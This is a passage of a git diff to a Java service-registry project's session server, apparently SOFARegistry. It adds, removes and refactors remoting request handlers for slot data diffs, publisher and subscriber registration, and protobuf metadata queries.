com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestResult; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffUtils; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.Map; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 15:41 yuzhi.lyz Exp $ + */ +public class DataSlotDiffDigestRequestHandler + extends AbstractServerHandler { + private static final Logger LOGGER = + LoggerFactory.getLogger(DataSlotDiffDigestRequestHandler.class); + + @Autowired ExecutorManager executorManager; + + @Autowired DataStore sessionDataStore; + + @Autowired SlotTableCache slotTableCache; + + @Override + public void checkParam(DataSlotDiffDigestRequest request) { + ParaCheckUtil.checkNonNegative(request.getSlotId(), "request.slotId"); + ParaCheckUtil.checkNotNull(request.getDatumDigest(), "request.datumDigest"); + } + + @Override + public Object doHandle(Channel channel, DataSlotDiffDigestRequest request) { + try { + DataSlotDiffDigestResult result = + calcDiffResult( + request.getSlotId(), + request.getDatumDigest(), + sessionDataStore.getDataInfoIdPublishers(request.getSlotId())); + result.setSlotTableEpoch(slotTableCache.getEpoch()); + result.setSessionProcessId(ServerEnv.PROCESS_ID); + return new GenericResponse().fillSucceed(result); + } catch (Throwable e) { + String msg = + StringFormatter.format("DiffSyncDigest request error for slot {}", request.getSlotId()); + LOGGER.error(msg, e); + return new GenericResponse().fillFailed(msg); + } + } + + @Override + public Object buildFailedResponse(String msg) { + return new GenericResponse().fillFailed(msg); + } + + private DataSlotDiffDigestResult calcDiffResult( + int targetSlot, + Map digestMap, + Map> existingPublishers) { + + DataSlotDiffDigestResult result = + DataSlotDiffUtils.diffDigestResult(digestMap, existingPublishers); + DataSlotDiffUtils.logDiffResult(result, targetSlot); + return result; + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.DATA; + } + + @Override + public Executor getExecutor() { + return executorManager.getDataSlotSyncRequestExecutor(); + } + + @Override + public Class interest() { + return DataSlotDiffDigestRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandler.java new file mode 100644 index 000000000..bfcc7d575 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandler.java @@ -0,0 +1,116 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherResult; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffUtils; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.List; +import java.util.Map; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 15:41 yuzhi.lyz Exp $ + */ +public class DataSlotDiffPublisherRequestHandler + extends AbstractServerHandler { + + private static final Logger LOGGER = + LoggerFactory.getLogger(DataSlotDiffPublisherRequestHandler.class); + + @Autowired SessionServerConfig sessionServerConfig; + + @Autowired ExecutorManager executorManager; + + @Autowired DataStore sessionDataStore; + + @Autowired SlotTableCache slotTableCache; + + @Override + public void checkParam(DataSlotDiffPublisherRequest request) { + ParaCheckUtil.checkNonNegative(request.getSlotId(), "request.slotId"); + ParaCheckUtil.checkNotNull(request.getDatumSummaries(), "request.datumSummaries"); + } + + @Override + public Object doHandle(Channel channel, DataSlotDiffPublisherRequest request) { + try { + final int slotId = request.getSlotId(); + DataSlotDiffPublisherResult result = + calcDiffResult( + slotId, + request.getDatumSummaries(), + sessionDataStore.getDataInfoIdPublishers(slotId)); + result.setSlotTableEpoch(slotTableCache.getEpoch()); + result.setSessionProcessId(ServerEnv.PROCESS_ID); + return new GenericResponse().fillSucceed(result); + } catch (Throwable e) { + String msg = + StringFormatter.format( + "DiffSyncPublisher request error for slot {}", request.getSlotId()); + LOGGER.error(msg, e); + return new GenericResponse().fillFailed(msg); + } + } + + private DataSlotDiffPublisherResult calcDiffResult( + int targetSlot, + List datumSummaries, + Map> existingPublishers) { + DataSlotDiffPublisherResult result = + DataSlotDiffUtils.diffPublishersResult( + datumSummaries, existingPublishers, sessionServerConfig.getSlotSyncPublisherMaxNum()); + DataSlotDiffUtils.logDiffResult(result, targetSlot); + return result; + } + + public Object buildFailedResponse(String msg) { + return new GenericResponse().fillFailed(msg); + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.DATA; + } + + @Override + public Executor getExecutor() { + return executorManager.getDataSlotSyncRequestExecutor(); + } + + @Override + public Class interest() { + return DataSlotDiffPublisherRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandler.java new file mode 100644 index 000000000..cdf578bee --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandler.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest; +import com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.List; + +/** + * @author xiaojian.xj + * @version $Id: GetRevisionPbHandler.java, v 0.1 2021年02月04日 21:55 xiaojian.xj Exp $ + */ +public class GetRevisionPbHandler + extends AbstractClientMetadataRequestHandler { + + @Override + public void checkParam(GetRevisionsRequest request) { + ParaCheckUtil.checkNotNull(request, "request"); + ParaCheckUtil.checkNotEmpty(request.getRevisionsList(), "request.revisions"); + } + + @Override + public Object doHandle(Channel channel, GetRevisionsRequest request) { + List revisions = request.getRevisionsList(); + GetRevisionsResponse response = appRevisionHandlerStrategy.queryRevision(revisions); + return response; + } + + @Override + public Class interest() { + return GetRevisionsRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaNodeConnectionHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaNodeConnectionHandler.java deleted file mode 100644 index c1ebd7f4a..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaNodeConnectionHandler.java +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; - -/** - * - * @author shangyu.wh - * @version $Id: ClientConnectionHandler.java, v 0.1 2017-12-08 20:17 shangyu.wh Exp $ - */ -public class MetaNodeConnectionHandler extends AbstractClientHandler { - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - protected NodeType getConnectNodeType() { - return NodeType.META; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandler.java new file mode 100644 index 000000000..846ba6a8c --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandler.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest; +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.List; + +/** + * @author xiaojian.xj + * @version $Id: MetaRevisionHeartbeatPbHandler.java, v 0.1 2021年02月04日 22:49 xiaojian.xj Exp $ + */ +public class MetaRevisionHeartbeatPbHandler + extends AbstractClientMetadataRequestHandler { + + @Override + public void checkParam(MetaHeartbeatRequest request) { + ParaCheckUtil.checkNotNull(request, "request"); + ParaCheckUtil.checkNotEmpty(request.getRevisionsList(), "request.revisions"); + } + + @Override + public Object doHandle(Channel channel, MetaHeartbeatRequest request) { + List revisions = request.getRevisionsList(); + MetaHeartbeatResponse response = appRevisionHandlerStrategy.heartbeat(revisions); + return response; + } + + @Override + public Class interest() { + return MetaHeartbeatRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandler.java new file mode 100644 index 000000000..95e7c5c4b --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandler.java @@ -0,0 +1,43 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.client.pb.MetaRegister; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.session.converter.pb.AppRevisionConvertor; +import com.alipay.sofa.registry.server.session.converter.pb.RegisterResponseConvertor; + +/** + * @author xiaojian.xj + * @version $Id: MetadataRegisterPbHandler.java, v 0.1 2021年02月04日 17:13 xiaojian.xj Exp $ + */ +public class MetadataRegisterPbHandler extends AbstractClientMetadataRequestHandler { + @Override + public Object doHandle(Channel channel, MetaRegister request) { + RegisterResponse registerResponse = new RegisterResponse(); + AppRevision appRevision = AppRevisionConvertor.convert2Java(request); + appRevisionHandlerStrategy.handleAppRevisionRegister(appRevision, registerResponse); + return RegisterResponseConvertor.convert2Pb(registerResponse); + } + + @Override + public Class interest() { + return MetaRegister.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NodeChangeResultHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NodeChangeResultHandler.java deleted file mode 100644 index 4847ac681..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NodeChangeResultHandler.java +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; - -/** - * - * @author shangyu.wh - * @version $Id: NodeChangeRequestHandler.java, v 0.1 2018-03-03 11:21 shangyu.wh Exp $ - */ -public class NodeChangeResultHandler extends AbstractClientHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(NodeChangeResultHandler.class); - - @Override - public Object reply(Channel channel, Object message) { - - if (!(message instanceof NodeChangeResult)) { - LOGGER.error("Request message type {} is not mach the require data type!", message - .getClass().getName()); - return null; - } - NodeChangeResult nodeChangeResult = (NodeChangeResult) message; - - NodeManager nodeManager = NodeManagerFactory.getNodeManager(nodeChangeResult.getNodeType()); - nodeManager.updateNodes(nodeChangeResult); - LOGGER.info("Update {} node list success!info:{}", nodeChangeResult.getNodeType(), - nodeChangeResult); - return null; - } - - @Override - protected NodeType getConnectNodeType() { - return NodeType.META; - } - - @Override - public void received(Channel channel, Object message) { - - } - - @Override - public Class interest() { - return NodeChangeResult.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandler.java index eb59882c1..6c31d1705 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandler.java @@ -18,83 +18,87 @@ import com.alipay.sofa.registry.common.model.Node.NodeType; import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.store.DataInfo; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; import com.alipay.sofa.registry.task.listener.TaskEvent; import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: DataChangeRequestHandler.java, v 0.1 2017-12-12 15:09 shangyu.wh Exp $ */ -public class NotifyProvideDataChangeHandler extends AbstractClientHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(NotifyProvideDataChangeHandler.class); - - private static final Logger TASK_LOGGER = LoggerFactory.getLogger( - NotifyProvideDataChangeHandler.class, "[Task]"); - /** - * store watchers - */ - @Autowired - private Watchers sessionWatchers; +public class NotifyProvideDataChangeHandler extends AbstractClientHandler { - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } + private static final Logger LOGGER = + LoggerFactory.getLogger(NotifyProvideDataChangeHandler.class); - @Override - protected NodeType getConnectNodeType() { - return NodeType.DATA; - } + private static final Logger TASK_LOGGER = + LoggerFactory.getLogger(NotifyProvideDataChangeHandler.class, "[Task]"); + /** store watchers */ + @Autowired Watchers sessionWatchers; - @Override - public Object reply(Channel channel, Object message) { + /** trigger task com.alipay.sofa.registry.server.meta.listener process */ + @Autowired TaskListenerManager taskListenerManager; - NotifyProvideDataChange notifyProvideDataChange = (NotifyProvideDataChange) message; + @Autowired ThreadPoolExecutor metaNodeExecutor; - if (!ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID.equals(notifyProvideDataChange - .getDataInfoId())) { - boolean result = sessionWatchers.checkWatcherVersions( - notifyProvideDataChange.getDataInfoId(), notifyProvideDataChange.getVersion()); - if (!result) { - LOGGER - .info( - "Request message dataInfo {}, version {} not be interested or lower than current version!", - notifyProvideDataChange.getDataInfoId(), - notifyProvideDataChange.getVersion()); - return null; - } + @Override + protected NodeType getConnectNodeType() { + return NodeType.META; + } - } - fireDataChangeFetchTask(notifyProvideDataChange); + @Override + public Object doHandle(Channel channel, ProvideDataChangeEvent provideDataChangeEvent) { + final String notifyDataInfoId = provideDataChangeEvent.getDataInfoId(); + if (!matchSession(notifyDataInfoId)) { + boolean result = + sessionWatchers.checkWatcherVersions( + provideDataChangeEvent.getDataInfoId(), provideDataChangeEvent.getVersion()); + if (!result) { + LOGGER.info( + "Request message dataInfo {}, version {} not be interested or lower than current version!", + provideDataChangeEvent.getDataInfoId(), + provideDataChangeEvent.getVersion()); return null; + } } + fireDataChangeFetchTask(provideDataChangeEvent); + return null; + } - private void fireDataChangeFetchTask(NotifyProvideDataChange notifyProvideDataChange) { - - TaskEvent taskEvent = new TaskEvent(notifyProvideDataChange, - TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); + private boolean matchSession(String dataInfoId) { + try { + DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + return dataInfo.getGroup().equals(ValueConstants.SESSION_PROVIDE_DATA_GROUP) + && dataInfo.getInstanceId().equals(ValueConstants.SESSION_PROVIDE_DATA_INSTANCE_ID); + } catch (Throwable e) { + return false; } + } - @Override - public Class interest() { - return NotifyProvideDataChange.class; - } -} \ No newline at end of file + private void fireDataChangeFetchTask(ProvideDataChangeEvent provideDataChangeEvent) { + TaskEvent taskEvent = + new TaskEvent(provideDataChangeEvent, TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK); + TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); + taskListenerManager.sendTaskEvent(taskEvent); + } + + @Override + public Class interest() { + return ProvideDataChangeEvent.class; + } + + @Override + public Executor getExecutor() { + return metaNodeExecutor; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandler.java index 82e04e37b..d53ded80f 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandler.java @@ -19,47 +19,28 @@ import com.alipay.sofa.registry.core.model.PublisherRegister; import com.alipay.sofa.registry.core.model.RegisterResponse; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; import com.alipay.sofa.registry.server.session.strategy.PublisherHandlerStrategy; import org.springframework.beans.factory.annotation.Autowired; -import java.util.concurrent.Executor; - /** * TODO * * @author shangyu.wh * @version $Id: SessionHandler.java, v 0.1 2017-11-29 11:32 shangyu.wh Exp $ */ -public class PublisherHandler extends AbstractServerHandler { - @Autowired - private ExecutorManager executorManager; - - @Autowired - private PublisherHandlerStrategy publisherHandlerStrategy; - - @Override - public Object reply(Channel channel, Object message) throws RemotingException { - - RegisterResponse result = new RegisterResponse(); - PublisherRegister publisherRegister = (PublisherRegister) message; - publisherHandlerStrategy.handlePublisherRegister(channel, publisherRegister, result); - return result; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return PublisherRegister.class; - } - - @Override - public Executor getExecutor() { - return executorManager.getAccessDataExecutor(); - } -} \ No newline at end of file +public class PublisherHandler extends AbstractClientDataRequestHandler { + + @Autowired PublisherHandlerStrategy publisherHandlerStrategy; + + @Override + public Object doHandle(Channel channel, PublisherRegister publisherRegister) { + RegisterResponse result = new RegisterResponse(); + publisherHandlerStrategy.handlePublisherRegister(channel, publisherRegister, result); + return result; + } + + @Override + public Class interest() { + return PublisherRegister.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherPbHandler.java new file mode 100644 index 000000000..84a78af5b --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherPbHandler.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb; +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.RemotingException; +import com.alipay.sofa.registry.server.session.converter.pb.PublisherRegisterConvertor; +import com.alipay.sofa.registry.server.session.converter.pb.RegisterResponseConvertor; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * TODO + * + * @author zhuoyu.sjw + * @version $Id: PublisherPBHandler.java, v 0.1 2018-04-02 15:52 zhuoyu.sjw Exp $$ + */ +public class PublisherPbHandler extends AbstractClientDataRequestHandler { + + @Autowired PublisherHandler publisherHandler; + + @Override + protected Node.NodeType getConnectNodeType() { + return publisherHandler.getConnectNodeType(); + } + + /** + * Reply object. + * + * @param channel the channel + * @param message the message + * @return the object + * @throws RemotingException the remoting exception + */ + @Override + public Object doHandle(Channel channel, PublisherRegisterPb message) { + RegisterResponsePb.Builder builder = RegisterResponsePb.newBuilder(); + + Object response = + publisherHandler.doHandle(channel, PublisherRegisterConvertor.convert2Java(message)); + if (!(response instanceof RegisterResponse)) { + return builder.setSuccess(false).setMessage("Unknown response type").build(); + } + + return RegisterResponseConvertor.convert2Pb((RegisterResponse) response); + } + /** + * Interest class. + * + * @return the class + */ + @Override + public Class interest() { + return PublisherRegisterPb.class; + } + + @Override + public Executor getExecutor() { + return publisherHandler.getExecutor(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandler.java new file mode 100644 index 000000000..e0b9cc5b4 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandler.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest; +import com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.List; + +/** + * @author xiaojian.xj + * @version $Id: ServiceAppMappingPbHandler.java, v 0.1 2021年02月04日 20:18 xiaojian.xj Exp $ + */ +public class ServiceAppMappingPbHandler + extends AbstractClientMetadataRequestHandler { + + @Override + public void checkParam(ServiceAppMappingRequest request) { + ParaCheckUtil.checkNotNull(request, "request"); + ParaCheckUtil.checkNotEmpty(request.getServiceIdsList(), "request.serviceIds"); + } + + @Override + public Object doHandle(Channel channel, ServiceAppMappingRequest request) { + List services = request.getServiceIdsList(); + ServiceAppMappingResponse response = appRevisionHandlerStrategy.queryApps(services); + return response; + } + + @Override + public Class interest() { + return ServiceAppMappingRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandler.java index f02295f28..bf9797a36 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandler.java @@ -19,47 +19,27 @@ import com.alipay.sofa.registry.core.model.RegisterResponse; import com.alipay.sofa.registry.core.model.SubscriberRegister; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; import com.alipay.sofa.registry.server.session.strategy.SubscriberHandlerStrategy; import org.springframework.beans.factory.annotation.Autowired; -import java.util.concurrent.Executor; - /** - * * @author shangyu.wh * @version $Id: SubscriberHandler.java, v 0.1 2017-11-30 15:01 shangyu.wh Exp $ */ -public class SubscriberHandler extends AbstractServerHandler { - @Autowired - private ExecutorManager executorManager; - - @Autowired - private SubscriberHandlerStrategy subscriberHandlerStrategy; - - @Override - public Object reply(Channel channel, Object message) throws RemotingException { - RegisterResponse registerResponse = new RegisterResponse(); - SubscriberRegister subscriberRegister = (SubscriberRegister) message; - subscriberHandlerStrategy.handleSubscriberRegister(channel, subscriberRegister, - registerResponse); - return registerResponse; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return SubscriberRegister.class; - } - - @Override - public Executor getExecutor() { - return executorManager.getAccessDataExecutor(); - } - -} \ No newline at end of file +public class SubscriberHandler extends AbstractClientDataRequestHandler { + + @Autowired SubscriberHandlerStrategy subscriberHandlerStrategy; + + @Override + 